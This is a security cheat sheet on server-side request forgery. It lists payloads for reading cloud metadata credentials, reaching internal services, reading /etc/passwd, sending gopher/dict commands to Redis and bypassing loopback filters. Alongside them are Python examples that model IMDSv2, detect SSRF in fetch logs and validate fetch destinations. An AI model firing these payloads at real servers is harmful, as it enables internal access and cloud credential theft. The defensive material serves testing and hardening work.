CyberCheatsheets

SSRF (Server-Side Request Forgery) Cheat Sheet

Server-side request forgery payloads: cloud metadata access, internal port scanning, filter bypasses, and blind SSRF detection.

Web Application Security | Tags: cloud, injection, owasp, ssrf, web | Updated 2026-06-17

Overview

SSRF tricks a server into making HTTP requests on your behalf, letting you reach internal services, cloud metadata endpoints, and localhost-only admin panels the firewall would otherwise block. Look for any feature that fetches a URL: webhooks, PDF/image generators, URL previews, import-from-URL, and SSO/OIDC callbacks.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Cloud metadata (highest impact)

AWS IMDSv1 metadata root

http://169.254.169.254/latest/meta-data/

AWS — list then read IAM role keys

http://169.254.169.254/latest/meta-data/iam/security-credentials/

GCP metadata (requires a header)

http://metadata.google.internal/computeMetadata/v1/  (header: Metadata-Flavor: Google)

Azure IMDS

http://169.254.169.254/metadata/instance?api-version=2021-02-01  (header: Metadata: true)
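
Why enforcing IMDSv2 removes the AWS payoff above, as an added example that is not code from the cheat sheet or from AWS: a simplified Python model of the token gating the EC2 metadata service applies when tokens are required. The header names and the PUT-then-GET flow are the documented IMDSv2 ones; the role name, the in-memory session table and the exact status codes are an illustrative simplification.

```python
"""Why 'enforce IMDSv2' stops the GET-only metadata SSRF.

Added example: a simplified Python model of the token gating the EC2 metadata
service applies when tokens are required. Not AWS code; the role name and
some status codes are illustrative.
"""
import secrets
import time

TOKEN_PATH = "/latest/api/token"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"
TTL_HEADER = "x-aws-ec2-metadata-token-ttl-seconds"   # documented IMDSv2 header names
TOKEN_HEADER = "x-aws-ec2-metadata-token"


class MockImds:
    """tokens_required=True models http-tokens=required (IMDSv2 only);
    False models the default 'optional', where IMDSv1 GETs still work."""

    def __init__(self, tokens_required=True, clock=time.time):
        self.tokens_required = tokens_required
        self.clock = clock            # injectable so expiry can be tested deterministically
        self.sessions = {}            # token -> expiry time
        self.role_name = "demo-role"  # constructed

    def handle(self, method, path, headers):
        """Return (status, body) as the metadata service would."""
        h = {k.lower(): v for k, v in headers.items()}
        if method == "PUT" and path == TOKEN_PATH:
            # IMDSv2 refuses to issue a token to a request that came through a proxy.
            if "x-forwarded-for" in h:
                return 403, "token request must not carry X-Forwarded-For"
            ttl = h.get(TTL_HEADER, "")
            if not ttl.isdigit() or not 1 <= int(ttl) <= 21600:
                return 400, "missing or invalid TTL header"
            token = secrets.token_urlsafe(32)
            self.sessions[token] = self.clock() + int(ttl)
            return 200, token
        if method != "GET":
            return 405, "method not allowed"
        token = h.get(TOKEN_HEADER)
        if token is not None:
            if self.sessions.get(token, 0) < self.clock():
                return 401, "unauthorized: unknown or expired token"
        elif self.tokens_required:
            return 401, "unauthorized: IMDSv2 token required"
        if path == CREDS_PATH:
            return 200, self.role_name  # v1-style success: the payoff the cheat sheet describes
        return 404, "not found"


def get_only_fetch(imds, path):
    """A typical SSRF sink: the application only ever issues a GET for the supplied URL."""
    return imds.handle("GET", path, {})


def sdk_fetch_credentials(imds, ttl=21600):
    """What an AWS SDK does: PUT for a session token, then GET with it."""
    status, token = imds.handle("PUT", TOKEN_PATH, {TTL_HEADER: str(ttl)})
    if status != 200:
        return status, token
    return imds.handle("GET", CREDS_PATH, {TOKEN_HEADER: token})


if __name__ == "__main__":
    print("IMDSv1 optional, GET-only fetch:", get_only_fetch(MockImds(tokens_required=False), CREDS_PATH))
    v2 = MockImds(tokens_required=True)
    print("IMDSv2 required, GET-only fetch:", get_only_fetch(v2, CREDS_PATH))
    print("IMDSv2 required, SDK flow:      ", sdk_fetch_credentials(v2))
```

The point the model makes: a fetcher that only issues GETs with an attacker-chosen path never obtains a token, so the credentials path answers 401 instead of the role name, while the instance's own SDK (PUT, then GET with the token) keeps working. On a real instance this is switched on with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`; the companion `--http-put-response-hop-limit 1` setting, which keeps the token PUT from succeeding through a containerised proxy, is a network-level control this model does not show.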

Internal targets

Loopback — reach localhost-only services

http://127.0.0.1:80/

Internal admin panel bound to localhost

http://localhost:8080/admin

Internal host (Redis, Elasticsearch, etc.)

http://10.0.0.5:6379/

Local file read if the fetcher honors file://

file:///etc/passwd

Interact with text protocols (Redis) via gopher/dict

dict://127.0.0.1:6379/INFO

Filter bypasses

Alternate loopback encodings (short form, all-zeros, octal)

http://127.1/   http://0/   http://0177.0.0.1/

127.0.0.1 as a decimal integer

http://2130706433/

IPv6 loopback / IPv4-mapped

http://[::1]/  http://[0:0:0:0:0:ffff:127.0.0.1]/

DNS names that resolve to 127.0.0.1

http://localtest.me/  http://127.0.0.1.nip.io/

Userinfo trick to confuse allowlist parsers

http://attacker.com@169.254.169.254/

Encoded path tricks against allowlist regexes

http://169.254.169.254%2f%2e%2e%2f

Blind SSRF detection

Point the request at your collaborator/listener

http://10.10.14.5/ssrf-test

Use an OOB DNS/HTTP canary

http://<id>.oast.fun/   # Burp Collaborator / interactsh

Watch your listener for the inbound hit

nc -lvnp 80   # or: interactsh-client

Escalation: internal port scan

Probe internal ports via response timing/errors

http://127.0.0.1:22/   http://127.0.0.1:3306/   http://127.0.0.1:8000/

Gopher to send arbitrary bytes (e.g. unauth Redis RCE)

gopher://127.0.0.1:6379/_<url-encoded-redis-commands>
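
The defender's counterpart to the blind-SSRF and internal port-scan sections above, as an added example that is not code from the cheat sheet: detection logic run over constructed URL-fetcher logs. It assumes the service that performs outbound fetches logs, per request, the requested scheme and the destination IP and port it resolved to; the log format, actor ids, timestamps and addresses are all constructed for the example.

```python
"""SSRF-attempt detection over URL-fetcher logs (added example, constructed data)."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: one line per outbound fetch, with the resolved destination.
LINE = re.compile(
    r"^(?P<ts>\S+) actor=(?P<actor>\S+) scheme=(?P<scheme>\S+) "
    r"dest=(?P<dest>\S+) port=(?P<port>\d+) result=(?P<result>\S+)$"
)
SAMPLE_LOG = """\
2024-05-01T10:00:01Z actor=u7 scheme=https dest=93.184.216.34 port=443 result=200
2024-05-01T10:00:05Z actor=u42 scheme=http dest=169.254.169.254 port=80 result=200
2024-05-01T10:00:09Z actor=u42 scheme=http dest=127.0.0.1 port=22 result=refused
2024-05-01T10:00:10Z actor=u42 scheme=http dest=127.0.0.1 port=3306 result=timeout
2024-05-01T10:00:11Z actor=u42 scheme=http dest=127.0.0.1 port=8000 result=200
2024-05-01T10:00:30Z actor=u9 scheme=gopher dest=127.0.0.1 port=6379 result=error
2024-05-01T10:00:40Z actor=u7 scheme=file dest=- port=0 result=denied
""".splitlines()

METADATA_IPS = {"169.254.169.254"}      # AWS and Azure IMDS; GCP's name resolves to the same address
HTTP_SCHEMES = {"http", "https"}
SCAN_THRESHOLD = 3                      # distinct internal ports per actor ...
SCAN_WINDOW = timedelta(seconds=60)     # ... within this window => port-scan pattern


def parse(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    ev["port"] = int(ev["port"])
    try:
        ev["addr"] = ipaddress.ip_address(ev["dest"])
    except ValueError:
        ev["addr"] = None                # e.g. file:// has no network destination
    return ev


def detect(lines):
    """Return a list of alerts {actor, kind, detail} for SSRF-shaped fetches."""
    alerts = []
    history = defaultdict(list)          # actor -> [(ts, port)] of internal fetches

    def add(actor, kind, detail):
        alerts.append({"actor": actor, "kind": kind, "detail": detail})

    for ev in filter(None, map(parse, lines)):
        actor, addr = ev["actor"], ev["addr"]
        where = f"{ev['dest']}:{ev['port']} result={ev['result']}"
        if ev["scheme"] not in HTTP_SCHEMES:          # gopher://, dict://, file:// ...
            add(actor, "scheme", f"non-http scheme {ev['scheme']}://")
        if addr is None:
            continue
        if ev["dest"] in METADATA_IPS:
            add(actor, "metadata", f"cloud metadata endpoint {where}")
        elif not addr.is_global:                       # loopback, RFC1918, link-local
            add(actor, "internal", f"internal destination {where}")
        if not addr.is_global:
            hist = history[actor]
            hist.append((ev["ts"], ev["port"]))
            recent = {p for t, p in hist if ev["ts"] - t <= SCAN_WINDOW}
            if len(recent) == SCAN_THRESHOLD:          # fire once, when the threshold is crossed
                add(actor, "portscan",
                    f"{len(recent)} internal ports within {SCAN_WINDOW.seconds}s: {sorted(recent)}")
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['actor']:4} {a['kind']:9} {a['detail']}")
```

The three signals map onto the cheat sheet's sections: any fetch whose resolved destination is the metadata address, any non-http scheme reaching the fetcher, and several distinct internal ports from one actor inside a short window, which is what the timing/error probing above looks like from the server side. Logging the resolved address rather than the requested hostname is what makes the first two checks robust against the DNS and encoding tricks in the bypass section.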

Tips

  • Cloud metadata is the money shot — IMDSv1 IAM creds turn SSRF into cloud account access.
  • If output isn't returned, treat it as blind SSRF and confirm with an OOB canary (interactsh/Collaborator).
  • gopher:// lets you craft raw TCP payloads — the path from SSRF to internal-service RCE.
  • Fix = allowlist destinations, block link-local/RFC1918 ranges, and enforce IMDSv2; apply all three.
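
An added example, not code from the cheat sheet, of the allowlist/range-blocking fix from the Tips list, written to reject every form in the Filter bypasses section: it normalises the host exactly as libc's inet_aton will (so `127.1`, `0`, octal and decimal forms become dotted quads), unwraps IPv4-mapped IPv6, refuses userinfo and percent-encoded hostnames, and judges every address a name resolves to rather than the hostname string. The DNS table (`FAKE_DNS`) and its 93.184.216.34 answer are constructed so the example runs offline; `system_resolve` is what a deployment would pass instead.

```python
"""Destination check for a server-side URL fetcher.

Added example (not from the cheat sheet): normalise the host the way the
fetcher's own resolver will, then judge the *resolved* address, so the
shorthand, IPv6, DNS and userinfo bypasses are all caught by one rule.
"""
import ipaddress
import re
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Only these characters may appear in a hostname; '%', '@', '\\' and spaces are rejected.
HOSTNAME_CHARS = re.compile(r"[A-Za-z0-9.\-:]+")

# Constructed DNS table so the example runs offline; a deployment passes system_resolve.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],        # constructed public answer
    "localtest.me": ["127.0.0.1"],           # public names that point at loopback
    "127.0.0.1.nip.io": ["127.0.0.1"],
    "metadata.google.internal": ["169.254.169.254"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])


def system_resolve(host):
    """Resolve via the OS and return every A/AAAA answer; all of them get checked."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def canonical_addresses(host, resolve):
    """Return the IP address(es) the fetcher would actually connect to for `host`."""
    # 1. IPv4 shorthand exactly as libc's inet_aton reads it:
    #    "127.1", "0", "0177.0.0.1" (octal) and "2130706433" (decimal) all become dotted quads.
    try:
        return [ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(host)))]
    except OSError:
        pass
    # 2. IPv6 literal (urlsplit already stripped the brackets); unwrap IPv4-mapped forms.
    try:
        addr = ipaddress.ip_address(host)
        return [addr.ipv4_mapped or addr]
    except ValueError:
        pass
    # 3. DNS name: every answer must pass, not just the first one.
    return [ipaddress.ip_address(a) for a in resolve(host)]


def validate_fetch_target(url, resolve=system_resolve):
    """Return (allowed, reason). Only public http/https destinations are allowed."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
        _ = parts.port                   # raises ValueError on a non-numeric/out-of-range port
    except ValueError:
        return False, "unparseable URL or port"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo (user@host) not allowed"
    if not host or not HOSTNAME_CHARS.fullmatch(host):
        return False, "missing or malformed hostname"
    try:
        addrs = canonical_addresses(host, resolve)
    except (OSError, ValueError):        # resolver failure or a non-IP answer
        addrs = []
    if not addrs:
        return False, "hostname does not resolve"
    for addr in addrs:
        if not addr.is_global:           # loopback, RFC1918, link-local, reserved, 0.0.0.0/8
            return False, f"destination {addr} is not a public address"
    return True, "ok: " + ", ".join(str(a) for a in addrs)


if __name__ == "__main__":
    for u in ["http://example.com/", "http://127.1/", "http://0/", "http://2130706433/",
              "http://[0:0:0:0:0:ffff:127.0.0.1]/", "http://localtest.me/",
              "http://attacker.com@169.254.169.254/", "http://169.254.169.254%2f%2e%2e%2f",
              "file:///etc/passwd", "dict://127.0.0.1:6379/INFO"]:
        print(f"{u:42} -> {validate_fetch_target(u, resolve=fake_resolve)}")
```

Two gaps remain even with this check in place. DNS rebinding: a name judged public here can re-resolve to 127.0.0.1 by the time the HTTP client connects, so hand the validated address (not the hostname) to the client or pin the resolved address for the connection. Redirects: every 3xx Location is a fresh destination and has to go through `validate_fetch_target` again before it is followed, since an allowed public host can redirect to the metadata address.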
